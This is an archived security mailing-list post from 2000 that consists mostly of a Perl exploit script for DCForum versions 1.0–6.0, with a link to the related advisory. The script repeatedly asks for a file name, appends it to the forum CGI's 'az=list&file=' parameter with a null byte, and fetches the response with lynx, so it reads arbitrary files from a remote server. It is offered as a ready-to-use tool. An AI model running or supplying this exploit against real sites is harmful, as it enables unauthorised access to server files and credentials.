|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: DCForum(v1.0 - 6.0) Exploit
From: SteeLe (SteeLe
PRIVACYX.COM)Date: Tue Dec 26 2000 - 22:55:12 CST
- Next message: Ben Greenbaum: "Summary of MS00-100"
- Previous message: Michal Zalewski: "Re: Potential Vulnerabilities in Oracle Internet Application Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Advisory: http://www.cgisecurity.com/advisory/2.txt
Exploit:
#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify
$site = $ARGV[0];
$cgi = $ARGV[1];
$inet = inet_aton($site);
die "\n\t--- Usage:$0 <site> <cgi location,duh> ---" if(ARGV == '0' ||
ARGV < 2);
print "\n\t--- DCForum 1.0 - 6.0 Exploit ---";
print "\n\t--- By the cool fellas at * ---\n\n";
while(true) { # yea i think I stole this from the pollex.pl , uh thanks.
print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);
print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action
ne "r" || $action ne "q");
if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
print "now exiting program\n";
exit;
}
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
- Next message: Ben Greenbaum: "Summary of MS00-100"
- Previous message: Michal Zalewski: "Re: Potential Vulnerabilities in Oracle Internet Application Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]